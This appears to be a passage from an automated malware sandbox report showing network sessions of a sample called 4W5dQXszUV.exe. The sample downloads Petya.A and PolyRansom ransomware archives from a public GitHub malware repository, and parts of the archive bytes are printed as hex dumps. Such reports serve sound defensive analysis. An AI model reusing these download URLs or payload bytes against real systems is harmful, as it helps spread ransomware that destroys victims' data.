36 a5 23 1e c4 24 12 15 ca b7 a4 1a 75 c7 6b e4 da 2a 69 10 87 3f d4 9a 22 be f4 9a 7b 8e eb 90 fd 12 2e 92 a4 4b 26 b4 6c 0d a9 e9 a7 b3 a2 44 1c 5e 6a f6 45 db d0
                                                                                                        Data Ascii: O{{@7%IPPb!]5+E]@I-S,$fc3:oQG$[iuu,5D8eL{\'XLt;J'Zb3zl|Cwapra;B<t('oRc>f|RIR:6#$uk*i?"{.K&lD^jE
                                                                                                        2022-09-29 12:45:18 UTC2019INData Raw: 56 31 92 10 f3 9e 62 74 c4 9e 90 4a 8c a3 7e 06 ac 4d 58 2e f8 93 82 5f 45 62 42 c3 0f f6 68 c5 fd 79 29 0e 5d 6b e7 58 92 8e fb 47 30 b2 5c 34 65 9a 97 1b fc ba 92 8c 0f 65 07 25 20 21 3d dc 10 50 98 4b 36 ce 6f 5d 45 d4 86 ae 66 e9 35 87 62 1b d8 be c7 dd 09 1a 6d 05 72 0b 74 5c 52 61 c5 29 60 25 42 39 c5 95 9f c4 67 bd c4 ec 28 98 54 97 4e de c7 be 64 ad 5f 74 59 c3 e4 28 1b 5b 59 c8 30 f4 78 c3 e6 1a 3b f5 38 fd 4c 22 4d e2 52 44 fc d6 01 dc c0 84 20 00 a1 74 39 53 9a 3d 96 9d 70 7d 37 f0 eb 50 18 e9 bf cc 2c 17 3f 50 7c d3 7a 7c 8f 86 a1 70 c8 33 ac 47 e0 78 da 78 37 5e 17 4b 80 a1 fd ee 7c 91 c4 36 bf ba 8d 5e 01 c1 08 90 e0 db 3d 09 df cd d2 f2 f4 69 54 44 2d e3 48 12 80 27 f5 19 81 e8 28 bc a2 18 4b f9 a6 e7 31 41 3d 6e 3d 4b c2 75 02 b1 18 dd 56
                                                                                                        Data Ascii: V1btJ~MX._EbBhy)]kXG0\4ee% !=PK6o]Ef5bmrt\Ra)`%B9g(TNd_tY([Y0x;8L"MRD t9S=p}7P,?P|z|p3Gxx7^K|6^=iTD-H'(K1A=n=KuV
                                                                                                        2022-09-29 12:45:18 UTC2035INData Raw: 19 2c d6 bd 6d a1 5c f4 65 8f d5 da a2 98 4e 2f 99 00 cb 81 b3 97 e0 5c 36 55 57 b6 32 93 89 b1 a3 f6 89 08 ae 6c 26 15 1a 05 4d d3 3c b0 d5 80 bc 10 34 e1 3c 50 0a fe a5 02 61 f4 13 32 f1 82 d8 0d 87 92 c0 16 f6 e3 0b 89 f0 fe 52 79 81 29 83 73 f9 ac bc 09 ee 18 5b ce 83 0e 92 42 e8 9f 77 2e 06 33 34 7e 94 1e fe 72 9d ca 00 29 8c 68 c2 f9 fc 11 5a f4 86 c5 fd 48 f0 2d 82 07 c5 99 5a 53 34 93 8a 8f 23 82 b0 1e 7d af 42 53 e0 55 20 6f 56 d7 b2 3b 6c f2 fe 37 e1 27 c6 b6 e3 31 5a 68 4a e3 6c 72 04 90 3e 85 a3 bf e0 68 c1 d1 b6 13 da f5 c1 b8 80 71 d4 3c 57 52 c5 41 6a e7 85 38 45 4a 75 00 20 25 19 87 cb 98 20 2c 00 64 ca a1 93 67 0b b3 43 c0 85 3b 8e 95 20 d8 4b 70 35 7d 87 c5 18 a8 1c 66 e8 86 4b a7 76 d7 13 91 d6 66 81 1c 9a c5 42 bd 50 b5 11 a4 65 22 1d
                                                                                                        Data Ascii: ,m\eN/\6UW2l&M<4<Pa2Ry)s[Bw.34~r)hZH-ZS4#}BSU oV;l7'1ZhJlr>hq<WRAj8EJu % ,dgC; Kp5}fKvfBPe"
                                                                                                        2022-09-29 12:45:18 UTC2051INData Raw: ab ef 57 27 6a f0 e6 a1 50 cc 23 35 75 72 91 14 41 a8 88 9a 11 f4 47 92 b2 9e 1d 2b ea 18 cc f7 19 7a 07 64 99 67 78 96 03 59 d5 9f 70 2b ab e3 9a 90 e3 87 98 c8 f5 a9 62 3f 0a c4 5f e7 3b 2f 8e 0c 7e b1 60 c5 35 2c 8b 23 75 ea cc ca 5d f5 da 7e 6d 8b fa 33 15 ea 70 3d a1 bb fc b4 df 6c cc 7e 4c a8 1a 99 00 20 a5 4c 33 c1 fd 47 56 c9 dc 5b 9c 9a 29 1b a3 d8 74 34 9d e2 67 74 25 f5 ec f1 56 e4 ea b2 35 4e de 0b fb 13 f5 98 a5 b9 a6 e1 f6 27 55 aa 55 df 04 13 ac b2 cb f3 7d 77 55 43 21 c5 1e c2 e5 7c e9 92 ba 86 f1 fc a5 94 cc e0 ca d9 cc 7a 51 fc af c1 54 28 82 b8 ca 77 ae 4f 2b 35 20 43 44 df 70 f4 3e ba 72 f9 61 72 6c bd 55 36 93 64 54 55 4f 30 98 e9 c0 37 63 b1 d3 8f 6e 6d 8b 10 5d 9f 65 a2 a0 f2 42 9e c7 51 2a 9f 6b 73 0f b9 1c a4 4f e2 8b 91 d6 00 01
                                                                                                        Data Ascii: W'jP#5urAG+zdgxYp+b?_;/~`5,#u]~m3p=l~L L3GV[)t4gt%V5N'UU}wUC!|zQT(wO+5 CDp>rarlU6dTUO07cnm]eBQ*ksO
                                                                                                        2022-09-29 12:45:18 UTC2067INData Raw: 2e 88 e1 1e bd 81 30 93 65 45 27 f6 09 7f 80 21 b9 9c 98 33 58 24 b3 4a 27 53 6f 5f 60 ee c9 1c 43 7a 7c f2 52 90 73 81 ec 24 d8 11 84 f1 54 e6 24 13 a7 85 fe be c9 af 96 8c 47 c5 f8 28 dc b4 bc 39 88 63 bd ed bb 49 a0 8c 92 3d ed 22 92 47 23 66 f8 01 31 11 cc a7 c4 9f 0f 7c 53 88 c1 16 14 d5 a5 3c f3 af 1c 23 57 7a 9b 88 47 0a a3 ff f2 5e 0a 65 86 f8 e7 ae 4c 93 f1 10 fe 1d 2b cc 33 67 74 0e 20 93 30 f0 ac 18 3e c8 41 cf 7d b2 b0 13 a9 62 38 bb c7 33 57 16 77 36 eb 8d 4c fa 1f f5 86 5f a7 e3 20 1e 5d 84 f9 83 d6 3d e9 d7 7b 08 db 5f fa e1 5c 5e 30 1c 83 01 50 56 4e 46 a6 e6 4e aa ce 6e 05 0d 84 71 41 26 fa d6 aa 96 6c 26 b7 ed 85 18 65 42 cf 92 5b d3 85 bc 45 a8 f2 f7 13 3c ce de fa f6 04 3c b7 ba 78 da 09 7b b1 d2 4e e2 4c 4a c6 6c 51 96 76 e7 c3 ee 36
                                                                                                        Data Ascii: .0eE'!3X$J'So_`Cz|Rs$T$G(9cI="G#f1|S<#WzG^eL+3gt 0>A}b83Ww6L_ ]={_\^0PVNFNnqA&l&eB[E<<x{NLJlQv6
                                                                                                        2022-09-29 12:45:18 UTC2083INData Raw: 96 07 2f e3 f1 83 68 ac e1 4c c0 1f 76 68 f8 da b5 eb 0b b8 c5 fe cf f3 0a 5d af 6d e7 7a 30 9e 36 90 d1 3a 7c d3 31 6e 95 d9 c1 64 fe af 90 59 a1 fd b5 4c 6e 3e 01 81 24 b4 64 32 4b 6e 7c 44 de e6 59 eb 3d 2a a1 25 a6 f2 4f 30 51 6b d9 65 6d f2 7e 03 ea f9 96 ab 4c e1 a4 96 dc 6d cc 38 e3 a0 40 46 84 14 4d 9a 9c 06 2d 8c a1 2a e1 6c 72 30 24 05 2e bb a9 b0 45 f1 dd 36 7c 9a d8 6e 4c 4a e5 9f e1 0c 49 74 6f b2 c9 14 17 58 9c 0e 6b 72 f4 54 0c 61 4f d3 f9 0a 39 92 77 c4 e5 08 53 78 3c 57 37 b6 2c 48 47 8a c7 2e 42 8d 42 29 51 c8 e5 30 37 c2 99 1f e4 c1 b0 8b e5 1c 6f 4d ac 26 a8 eb 5d 53 70 59 df f3 ab 08 8c 3e e0 27 b9 cb 5f c6 0d ca 75 64 6d 70 07 a3 11 ec 76 f9 23 8b 2e 39 95 16 7d b0 02 ce 38 f6 39 54 a0 0b 6d 73 b6 fe 6a 55 a3 6d af 97 aa 7a fc 22 c1
                                                                                                        Data Ascii: /hLvh]mz06:|1ndYLn>$d2Kn|DY=*%O0Qkem~Lm8@FM-*lr0$.E6|nLJItoXkrTaO9wSx<W7,HG.BB)Q07oM&]SpY>'_udmpv#.9}89TmsjUmz"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        16192.168.2.449739140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:22 UTC2099OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:22 UTC2099INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:12 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:22 UTC2100INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        17192.168.2.449740185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:22 UTC2102OUTGET /Endermanch/MalwareDatabase/master/ransomwares/Petya.A.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:22 UTC2102INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 131293
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "db31807bd0d2739f220f59cdf06ed3d47d3bb4373e6414156d7274ec658e5f22"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        X-GitHub-Request-Id: 3596:11E0C:3901A7:400694:63359347
                                                                                                        Accept-Ranges: bytes
                                                                                                        Date: Thu, 29 Sep 2022 12:45:22 GMT
                                                                                                        Via: 1.1 varnish
                                                                                                        X-Served-By: cache-mxp6954-MXP
                                                                                                        X-Cache: HIT
                                                                                                        X-Cache-Hits: 1
                                                                                                        X-Timer: S1664455523.851672,VS0,VE1
                                                                                                        Vary: Authorization,Accept-Encoding,Origin
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        X-Fastly-Request-ID: e69f50ad8ed243d2d09ebacc3f6528df6d2eb274
                                                                                                        Expires: Thu, 29 Sep 2022 12:50:22 GMT
                                                                                                        Source-Age: 27
                                                                                                        2022-09-29 12:45:22 UTC2102INData Raw: 50 4b 03 04 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 c5 69 3f 6d 6a b3 50 f6 03 c1 1a b8 f7 06 bc e8 4e e6 64 7c d2 a2 19 04 df 3e cc 63 7f ad 0d ab 2e 25 b6 c6 4e e4 92 f1 e3 de 02 49 83 18 f7 d9 37 7b e4 46 02 4f c1 d9 09 32 0e 77 54 3a f4 c7 82 67 94 d7 eb 64 67 0d b0 e3 80 9f 7b 94 5f 3a 03 b2 8d ed 60 1a ae e3 cf fd 4c cd b0 e9 b7 a8 f8 6a 52 b8 30 81 64 2c ae 01 f2 35 09 de 93 21 a8 1d ba de 2a 75 36 e3 0e a5 4e b8 6e 38 89 e0 52 ef 05 7b 9e 64 0a dc 0b 7c db 7b bc c0 03 b2 b3 90 ab 1b 0e 5b 9f dc bb d2 04 05 79 0b 66 e5 e5 21 c3 66 ae 41 c6 e9 c6 e8 94 83 82 0c 16 c0 97 6e 6c a7 bd ab 7d f0 b9 d5 df 40 de 8d 1b 1f 06 bc 58 c6 85 8d f0 0d 36 bb 05
                                                                                                        Data Ascii: PKtIwH+Endermanch@Petya.A.exei?mjPNd|>c.%NI7{FO2wT:gdg{_:`LjR0d,5!*u6Nn8R{d|{[yf!fAnl}@X6
                                                                                                        2022-09-29 12:45:22 UTC2118INData Raw: e3 03 fc 3b 3f e2 b5 58 26 d3 67 a6 ec a6 12 cf 6c 6f 02 9a d6 95 58 01 ae ce 13 2f c2 8c 59 0f 74 14 c6 2a 51 00 2e 42 eb ac b5 04 92 cb 16 ed b9 92 62 db f4 0c 49 d3 a0 79 c5 56 e9 2a 2c 3a 14 43 16 cd eb 11 82 f9 24 e4 29 80 6e 81 74 41 76 1b 0f 65 45 57 1b 51 54 a3 ca 45 c4 90 19 13 ec 1d 35 6a b2 bc ca 3f c3 64 e8 de 69 be b4 f4 4d 6d 61 d3 2a 02 9f 1a 6d 3e 82 b7 63 8f 5f 55 a5 c0 fb cb c0 97 f1 de 98 59 c5 39 d1 f9 b9 8d 1a 50 eb b0 17 33 01 b6 6b a7 4e c7 70 fb d8 d4 84 fe 36 d1 b1 6c 60 63 13 cd 0a f2 97 af 8a db 48 95 d5 8f fc 1b c7 a0 70 4b 64 2f 06 f2 f9 0f 15 97 67 c7 46 8e db 81 3c ff 9d e6 d0 2a 65 90 45 57 f9 02 75 49 f9 f6 b2 2d c1 a9 87 7c c8 9f bc 23 da fe 19 57 92 32 84 40 95 5e 59 f3 8b 2d 5b c8 c8 83 06 51 89 74 3e 77 b9 39 01 80 57
                                                                                                        Data Ascii: ;?X&gloX/Yt*Q.BbIyV*,:C$)ntAveEWQTE5j?diMma*m>c_UY9P3kNp6l`cHpKd/gF<*eEWuI-|#W2@^Y-[Qt>w9W
                                                                                                        2022-09-29 12:45:22 UTC2134INData Raw: f6 fa 35 99 c0 32 e3 e1 14 6d 4e 54 e7 a4 ec 0e eb 92 50 f9 59 62 f0 4e 44 b6 54 dc f6 19 c0 93 0a 46 da 99 92 df fb 84 ce 21 a9 3c 7b 16 8e 80 f6 91 38 93 7a d1 27 5f d8 85 87 84 8f 0f cf 68 b5 11 45 99 88 e1 0f 28 1a b8 23 01 78 a9 ad 5e d5 df 35 0f e1 23 f6 6a 83 4c f1 1b 93 f9 22 aa 6a ef fd 4b 07 fe 4a 8a d4 7b 06 e5 9f 6e 97 ac 25 8f 9c d5 23 55 72 e0 ac bb e1 00 a4 6c 83 d0 16 8c d2 87 e8 df ad 90 3c 9e e6 3b 3c d0 7f a1 ac 4f df f9 a1 90 54 db 0d 42 a0 84 21 2d 66 db bf 1b cb 85 6b 5c 2c 6c 27 e2 bf b6 37 f0 86 67 b2 e8 bd 56 5c 74 b0 e1 97 0d 28 e8 78 6c 54 83 1f f6 45 c6 20 56 49 06 4d f0 49 f9 86 1c e3 e4 52 98 85 69 d9 cf 2d d3 2b 2d 87 1a 76 fe 44 d2 ce cf 61 3e 18 6f 01 6b 3f 10 5e d7 46 64 6e 2e 79 ab 1f e2 b9 03 1b 45 2a 29 bf 61 19 c8 a5
                                                                                                        Data Ascii: 52mNTPYbNDTF!<{8z'_hE(#x^5#jL"jKJ{n%#Url<;<OTB!-fk\,l'7gV\t(xlTE VIMIRi-+-vDa>ok?^Fdn.yE*)a
                                                                                                        2022-09-29 12:45:22 UTC2150INData Raw: 45 80 44 59 83 bb 64 55 54 24 80 63 0c 30 d3 d9 80 d1 99 40 74 4d 8c aa af 46 49 b7 45 ea 0a a0 74 cb a5 88 f3 98 91 32 8f 5b a5 99 da bd 56 e0 48 d4 04 88 54 47 c0 31 f8 2d 8c ef 37 2f 22 15 95 df 18 f1 a4 69 70 8c ab fd 9c bf 13 e7 45 43 fe 7e 76 e4 27 e6 bd bb f7 cb 46 fc 34 82 b5 d8 86 8b e1 74 9f f0 56 20 21 06 b9 de 77 1c 43 d7 36 4a 61 26 e3 dc a9 19 16 de 70 a1 a2 8b 93 f6 e2 3c ed 8b ff 44 20 29 17 70 2c d1 90 79 e8 24 f5 1b 0b 39 a8 9c dc 92 fc 8c ce 99 47 f6 c8 a9 0d 34 5a 0c 53 cf 1c 5f f5 91 fd 01 1e ae fc 22 5f cc ea ac bf 6f 68 45 a9 3a 32 16 25 8f 1a ec e9 6c 97 bd 88 d1 a2 f5 a2 84 67 1e 6b be b3 d5 f2 c0 4d f2 a2 0d f1 c7 d3 9b 35 f4 45 ae a4 90 6d 0f 95 79 f2 bc e2 0c 18 f3 5c ee 8c 1a 84 a6 48 d5 4f b0 84 cd 46 97 bb a2 61 01 3c 5b 0e
                                                                                                        Data Ascii: EDYdUT$c0@tMFIEt2[VHTG1-7/"ipEC~v'F4tV !wC6Ja&p<D )p,y$9G4ZS_"_ohE:2%lgkM5Emy\HOFa<[
                                                                                                        2022-09-29 12:45:22 UTC2166INData Raw: c8 db ff fd e3 5d 93 6b a6 43 4e b0 97 78 3b 25 a7 15 3a 03 e3 8c 10 2c 4d dd f2 ea a5 25 c1 d4 3d e3 85 8b 41 35 0c df 06 87 a9 08 d5 6b cc 56 3c e5 14 16 5d 41 6c 22 a6 1b 77 a6 d2 c3 d6 26 05 21 77 70 9a 40 21 ff 27 a6 77 4e 46 ae f0 d7 fb 4f b8 9e f8 f3 8e 95 39 54 d3 7b 95 95 4e 1a 9f 76 02 ea 87 2a fa 56 79 23 45 e0 b2 36 d0 e9 68 24 d8 16 9f 8c 0f 14 b0 17 29 44 86 9f d2 4a fd 95 56 de e6 dc 80 2a 41 51 d4 fc d7 93 72 14 7c 02 67 72 78 ff 78 0d 44 b6 e1 00 c4 48 4f 7f 06 57 07 1c 17 fa bd 43 b8 27 2e 0f 71 1f 55 7c ba 83 75 5d b2 97 50 e4 f6 95 07 9f f2 b3 14 01 06 90 9a 20 35 d7 7b e0 7f 49 5b c6 05 7b 74 cc 64 2b 37 26 19 f0 f9 9c 1b 4b a5 a8 fb 66 16 b0 7c 27 63 0f ff 5f d9 28 9a b9 bf 71 6b 44 7c 69 c6 2e cc 82 b6 5c 69 89 1e 46 6d 71 44 3b 22
                                                                                                        Data Ascii: ]kCNx;%:,M%=A5kV<]Al"w&!wp@!'wNFO9T{Nv*Vy#E6h$)DJV*AQr|grxxDHOWC'.qU|u]P 5{I[{td+7&Kf|'c_(qkD|i.\iFmqD;"
                                                                                                        2022-09-29 12:45:22 UTC2182INData Raw: d7 17 95 9c 1e b8 8f b1 25 4b 59 d8 41 52 ff f4 18 4f 61 2c 75 4e 6c 69 7b 77 7b 6d 55 09 82 c6 57 e1 74 81 7e c9 9b 8f e9 b3 4c f8 f3 2d 70 22 a4 06 15 54 2b 0b 65 19 db de 48 fc a2 34 03 0c 54 a5 92 1f 8a 9c 52 95 e2 0e 3e f6 d5 5b 28 9f 86 e3 8b a1 39 1e fc 6f 18 bf 12 81 8e cf a0 95 53 2c e1 01 75 c4 1f 15 23 03 c1 a2 e5 47 1a c0 82 dc a6 b0 81 d8 f4 25 f9 b9 1e bb 5e 05 02 49 bb 97 e7 6f 2d dc 0d 6f 05 9c ed f7 82 0f 1a f1 f5 ed 68 b3 e5 39 54 89 25 c3 21 1b f6 04 ee d9 20 af 0e 77 80 9a 16 78 98 f6 1a 1c d8 d2 25 c9 d0 6e 5b a7 c9 4a 01 18 d9 e5 6f 11 ed 69 07 d0 1c a4 8a ae c1 c4 73 42 18 04 60 2f 9d 2c 0e ff 91 47 d7 28 92 8e 96 39 78 5d b2 ad d8 7e 62 36 4b 4f 6c f7 72 5d ad 7c 7c a1 76 ce 80 0a 16 1e db fd dc 9d e2 8c c5 ec 3c e3 55 24 11 2f 80
                                                                                                        Data Ascii: %KYAROa,uNli{w{mUWt~L-p"T+eH4TR>[(9oS,u#G%^Io-oh9T%! wx%n[JoisB`/,G(9x]~b6KOlr]||v<U$/
                                                                                                        2022-09-29 12:45:22 UTC2198INData Raw: df c1 76 f4 35 bb 04 25 57 c2 ab 00 8c e1 70 4c 84 d5 c3 45 e2 fb 55 67 38 f6 5a 09 06 3b c9 1c 17 74 72 22 a9 3d 55 9e 05 b9 11 70 d4 49 44 d8 87 53 a1 db 91 c6 c3 65 8f 8d 0f 49 8d 45 df da b2 0c 24 6a 6c db 7a c1 95 31 77 f3 25 4c 59 a3 4e d9 31 2f 04 41 ee ea b3 60 d1 34 ec e2 b8 6a 2f 9c 4e b7 fb 92 13 ba e2 b5 c4 a8 12 f9 4a 73 03 c5 c6 ed c9 c4 e7 d8 f5 0e 1c 4a b4 a0 31 ea 11 bb 05 db cd 09 fa 3a d2 02 89 e1 a7 d7 e9 d8 36 8d 6d f5 ae 4e 6c a0 e7 3c 02 64 04 4a 70 e0 34 15 d1 ed a8 9d 8a 1f 2c 54 03 a9 99 94 1c 02 ac 38 a7 49 3c 35 87 3c 6f 21 ac 28 85 a2 cb 2b ef 77 24 03 52 4d bb fe 2d 0c c1 c4 55 36 8f ab 07 4b e7 6d d9 f4 05 69 da 13 a9 a2 66 e3 f5 a0 74 91 fa 6c 26 36 2d 60 2d aa 38 9b be 4b 6d 35 10 9d 07 8b 81 ad 2f bd de 28 9e 93 33 d6 8b
                                                                                                        Data Ascii: v5%WpLEUg8Z;tr"=UpIDSeIE$jlz1w%LYN1/A`4j/NJsJ1:6mNl<dJp4,T8I<5<o!(+w$RM-U6Kmiftl&6-`-8Km5/(3
                                                                                                        2022-09-29 12:45:22 UTC2214INData Raw: b9 56 9d 0d 0d ca 9f 7e 8e 82 ab 25 44 e4 0c fa af 3e 0d 0e ef f6 8f ff fc be 74 b1 11 8f 1c 4f ae 93 cb 60 2d 12 f2 11 e1 dc a2 fb 29 39 4e b5 69 13 1a 7d 37 ee f6 91 7e 91 e5 af b6 13 c9 70 e3 3f bb 6b 0a 1f f2 df 0c 04 c1 4a dd 48 f8 00 29 95 91 70 e7 a6 bf 8d d8 c7 c4 84 37 d0 11 76 ba 6c df 40 bb 38 27 71 bf 85 6c 3d 01 e5 a9 3c d7 a7 55 14 99 f1 1d c8 22 5f b3 6b 75 c9 fc 1e 2c 0c 7e 31 d6 80 95 d1 dc dd 59 28 f0 cd 56 da c6 3a b8 68 21 ce c4 ae bc 3a 67 08 bf d4 58 68 d3 87 72 0c 3c 8c 28 bf fb 3b 06 ed c9 3a c0 bc 0e fc 81 06 2e c2 05 35 78 3f d2 62 cb 5c 7c 52 2f f6 11 e7 3c f6 bb 84 7a c7 06 39 ec 98 4e ee 80 04 cb 1c 63 35 4b 21 4d 7c 55 a3 77 53 e2 13 c9 14 72 6e c1 9f c4 ca c1 c7 65 4a d6 04 32 ed 9e 30 d3 8d 80 de 56 31 63 ad a0 78 4d de 34
                                                                                                        Data Ascii: V~%D>tO`-)9Ni}7~p?kJH)p7vl@8'ql=<U"_ku,~1Y(V:h!:gXhr<(;:.5x?b\|R/<z9Nc5K!M|UwSrneJ20V1cxM4
                                                                                                        2022-09-29 12:45:22 UTC2230INData Raw: 7d 2f cf 2b 66 5e e7 fd f6 04 2d e1 2e c3 2e a3 6f 68 07 35 be 01 71 49 6b 98 ae 0b 35 0c 3e bc 4b e2 9a 59 87 ed 3d 0b f5 41 9b 6d 5f 41 eb 41 ed 67 44 91 99 2c c9 e2 22 b4 ee 16 b9 d3 0c ca 0d c0 55 a2 18 2b 51 3b 0b f8 34 68 e6 9b 47 58 cf 62 c2 31 87 eb fe f1 c1 82 3f 75 4d da 24 50 4b 01 02 3f 00 14 00 01 00 08 00 13 74 0f 49 e7 77 8c 48 2b 00 02 00 00 86 03 00 16 00 24 00 00 00 00 00 00 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 50 65 74 79 61 2e 41 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 65 92 e4 b8 e8 f6 d1 01 2a d0 df e4 e7 9d d4 01 10 ba de e4 e7 9d d4 01 50 4b 05 06 00 00 00 00 01 00 01 00 68 00 00 00 5f 00 02 00 00 00
                                                                                                        Data Ascii: }/+f^-..oh5qIk5>KY=Am_AAgD,"U+Q;4hGXb1?uM$PK?tIwH+$ Endermanch@Petya.A.exe e*PKh_


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        18192.168.2.449741140.82.121.3443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:26 UTC2231OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                        Host: github.com
                                                                                                        2022-09-29 12:45:26 UTC2231INHTTP/1.1 302 Found
                                                                                                        Server: GitHub.com
                                                                                                        Date: Thu, 29 Sep 2022 12:44:12 GMT
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                        Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                        Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip
                                                                                                        Cache-Control: no-cache
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                        X-Frame-Options: deny
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 0
                                                                                                        Referrer-Policy: no-referrer-when-downgrade
                                                                                                        Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                        2022-09-29 12:45:26 UTC2231INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                        Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        19192.168.2.449742185.199.110.133443C:\Users\user\Desktop\4W5dQXszUV.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2022-09-29 12:45:26 UTC2233OUTGET /Endermanch/MalwareDatabase/master/ransomwares/PolyRansom.zip HTTP/1.1
                                                                                                        Host: raw.githubusercontent.com
                                                                                                        2022-09-29 12:45:26 UTC2233INHTTP/1.1 200 OK
                                                                                                        Connection: close
                                                                                                        Content-Length: 133759
                                                                                                        Cache-Control: max-age=300
                                                                                                        Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                        Content-Type: application/zip
                                                                                                        ETag: "c0c6af3e39ace2d58d00154f6e809181a5c813ca80bbf20f38837a99f8056014"
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-Frame-Options: deny
                                                                                                        X-XSS-Protection: 1; mode=block
